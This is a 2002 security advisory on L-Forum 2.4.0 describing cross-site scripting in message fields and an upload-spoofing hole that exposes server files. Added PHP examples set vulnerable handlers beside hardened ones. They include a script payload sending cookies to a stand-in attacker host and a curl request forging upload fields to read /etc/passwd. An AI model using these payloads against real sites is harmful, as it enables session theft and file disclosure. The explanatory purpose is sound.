L-Forum Bulletin Board Input Validation Holes Let Remote Users View Files on the System and Conduct Cross-Site Scripting Attacks Against L-Forum Users
SecurityTracker Alert ID: 1005040
SecurityTracker URL: http://securitytracker.com/id/1005040
Date: Aug 14 2002
Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Fix Available: Yes  Vendor Confirmed: Yes
Several vulnerabilities were reported in the L-Forum bulletin board software. A remote user can view files on the server and can conduct cross-site scripting attacks against L-Forum users.
In two vulnerabilities, the software fails to filter user-supplied input, allowing remote users to conduct cross-site scripting attacks. If the L-Forum "Enable HTML in messages" Administration option is set to "on", the system will display user-supplied HTML in the From, E-Mail, Subject, and Body fields of messages. When the option is set to "off", the system strips HTML only from the Body field and will still display HTML code in the From, E-mail, and Subject fields.
A remote user can submit a specially crafted message that, when viewed by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the L-Forum site and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
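The following PHP is an added example and is not L-Forum's code. It reconstructs the behaviour described above as a hypothetical renderer (the real L-Forum templates are not reproduced on this page): with "Enable HTML in messages" off, only the Body is stripped of tags, while From, E-mail and Subject are echoed raw. The hardened version escapes every user-controlled field at output time. The message contents are constructed for the demonstration.

```php
<?php
// Added example, not L-Forum code. Reconstructs the reported behaviour:
// with "Enable HTML in messages" off, only the Body loses its HTML, while
// From, E-mail and Subject are emitted unfiltered.

// Constructed message as a remote user might post it. The payload sits in
// the Subject, which the vulnerable renderer never filters.
$message = [
    'from'    => 'alice',
    'email'   => 'alice@example.invalid',
    'subject' => 'hello <script>document.location="http://attacker.invalid/?c="+document.cookie</script>',
    'body'    => 'plain <b>bold</b> text',
];

// Hypothetical reconstruction of the vulnerable rendering logic.
function render_message_vulnerable(array $m, bool $html_enabled): string
{
    // Body is stripped only when the option is off; the other fields never are.
    $body = $html_enabled ? $m['body'] : strip_tags($m['body']);
    return "<p><b>From:</b> {$m['from']} &lt;{$m['email']}&gt;<br>"
         . "<b>Subject:</b> {$m['subject']}</p>"
         . "<div>{$body}</div>\n";
}

// Hardened rendering: every user-controlled field is HTML-escaped at output
// time, so the browser sees the payload as text. ENT_QUOTES also escapes
// ' and ", which matters when a field lands inside an attribute value.
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_message_safe(array $m): string
{
    // The body is escaped too. A site that genuinely wants HTML in bodies
    // needs an allowlist sanitiser, not a raw echo behind an admin switch.
    return "<p><b>From:</b> " . esc($m['from']) . " &lt;" . esc($m['email']) . "&gt;<br>"
         . "<b>Subject:</b> " . esc($m['subject']) . "</p>"
         . "<div>" . esc($m['body']) . "</div>\n";
}

echo "--- vulnerable, HTML off: script survives in Subject ---\n";
echo render_message_vulnerable($message, false);
echo "--- hardened: payload rendered as text ---\n";
echo render_message_safe($message);
```

Run it with `php render.php` and compare the two outputs: the first contains a live `<script>` element inside the Subject line, the second contains only `&lt;script&gt;`. The point the advisory makes is that the admin option is not a security boundary; escaping at the output sink is.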
A separate vulnerability allows remote users to view files on the system. The file upload function reportedly does not verify that the attachment, attachment_name, attachment_size and attachment_type variables were set during a file upload rather than as ordinary POST fields. A remote user can send those variables in a plain POST request, pointing attachment at any file on the system, so that the server treats a local file as the uploaded attachment. This allows a remote user to view any file on the system that is readable by the web server process.
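The PHP below is an added example, not L-Forum's code, showing the upload-spoofing pattern the advisory describes beside the check that closes it. It assumes register_globals-style handling, under which both a multipart file upload and an ordinary POST field named `attachment` populate the global `$attachment`; the handler functions, the `attachments` directory and the request shown in the comments are all hypothetical.

```php
<?php
// Added example, not L-Forum code. Assumes register_globals-style handling
// (the PHP 4 default of the day): a multipart upload and a plain POST field
// named "attachment" both end up in the global $attachment.

// A real upload of "notes.txt" makes PHP set these globals (values constructed):
//   $attachment      = "/tmp/phpA1b2C3"   (server-side temp file)
//   $attachment_name = "notes.txt"
//   $attachment_size = 1234
//   $attachment_type = "text/plain"
//
// A forged request with no file part at all sets the very same globals from
// the request body (hypothetical handler URL):
//   curl -d 'attachment=/etc/passwd&attachment_name=passwd&attachment_size=1&attachment_type=text/plain' \
//        http://forum.example.invalid/post.php
// so $attachment now names a local file the httpd user can read, and the
// forum later serves it back as an "attachment".

$attachment_dir = __DIR__ . '/attachments';   // assumed storage directory

// Hypothetical reconstruction of the vulnerable handler: it trusts the globals
// and copies whatever $attachment points at, so /etc/passwd becomes a
// downloadable attachment.
function store_attachment_vulnerable(string $attachment, string $attachment_name, string $dir): bool
{
    return copy($attachment, $dir . '/' . basename($attachment_name));
}

// Hardened handler: read upload metadata from $_FILES only (populated solely
// from multipart file parts, never from plain POST fields), confirm the upload
// succeeded, and let PHP verify that the temp path was created by this
// request's upload machinery before touching it.
function store_attachment_safe(array $files, string $field, string $dir): bool
{
    if (!isset($files[$field]) || !is_array($files[$field])) {
        return false;                         // no file part under that name
    }
    $f = $files[$field];
    if ($f['error'] !== UPLOAD_ERR_OK) {
        return false;                         // partial upload, size limit, etc.
    }
    // is_uploaded_file() is false for any path not produced by the upload
    // machinery for this request, which defeats attachment=/etc/passwd.
    if (!is_uploaded_file($f['tmp_name'])) {
        return false;
    }
    $name = basename($f['name']);             // strip any client-supplied path
    // move_uploaded_file() repeats the is_uploaded_file() check internally.
    return move_uploaded_file($f['tmp_name'], $dir . '/' . $name);
}

// Usage from a form handler, with register_globals off and $_FILES used directly:
//   if (store_attachment_safe($_FILES, 'attachment', $attachment_dir)) { /* store metadata */ }
```

The hardened function never looks at `$attachment` or the three companion variables; the size and MIME type, if they are needed, come from `$_FILES['attachment']['size']` and `['type']`, and the type is still client-supplied and should not be trusted for anything security-relevant.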
A remote user can access the target user's cookies (including authentication cookies), if any, associated with a site running L-Forum, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
A remote user can also view files on the system that are readable by the web server.
The vendor has released a patch on the program's homepage (see the Vendor URL below).
The vendor also reports that version 2.4.1 will include a fix.
The author of the report notes that the patch corrects the second cross-site scripting flaw (HTML shown in the From, E-mail and Subject fields when the option is off) and the file upload flaw, but not the first (HTML displayed when the option is on); turning "Enable HTML in messages" off in L-Forum Administration closes the remaining hole.
Vendor URL: l-forum.x-php.net/
Access control error, Input validation error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Underlying OS Comments: PHP-based
Source Message Contents
Subject: [Full-Disclosure] L-Forum XSS and upload spoofing
L-Forum XSS and upload spoofing
VENDOR: Leszek Krupinski <email@example.com>
VULNERABLE VERSIONS: 2.4.0, possibly others
IMMUNE VERSIONS: none, but an official patch is available for
LOGIN REQUIRED: no
"L-Forum is [a] universal Web forum written in PHP. It has support
for threading, multiple languages, and the PostgreSQL/MySQL database
server. You can also easily change its design, or even change design
on-the-fly with themes support."
(direct quote from the program's project page at Freshmeat)
L-Forum is published under the terms of the GNU General Public
L-Forum has got two different XSS (Cross-Site Scripting) holes,
in a forum. It has also got an upload spoofing hole, indirectly
allowing an attacker to download any file on the server that the
httpd daemon can read.
1) If "Enable HTML in messages" is set to on in L-Forum
Administration, the users are exposed to several XSS (Cross-Site
Scripting) holes every time they read a message. If it is on, all
parts of a message (the From, E-Mail, Subject and Body fields)
may contain all kinds of HTML code, including script tags that
redirect you to Gobbles' homepage.
2) When "Enable HTML in messages" is set to off in L-Forum
Administration, HTML code is only removed from the Body, and not
from the From, E-mail and Subject fields.
3) The file upload function allows uploads to occur, without checking
if the four global variables with information about an upload
(attachment, attachment_name, attachment_size and attachment_type)
really were set by uploading a file or if they were normal POST
data. This means that it can be fooled into treating any file that
the web server can read (like /etc/passwd) as the uploaded file.
COMMUNICATION WITH VENDOR:
The vendor was contacted on the 9th of July. He replied very quickly,
and posted an official patch that fixes problems number 2 and 3,
but not number 1, on the program's homepage. There is no official
new release yet, but if you apply the patch and turn off "Enable
HTML in messages" in L-Forum Administration, you are immune to all
// Ulf Harnhammar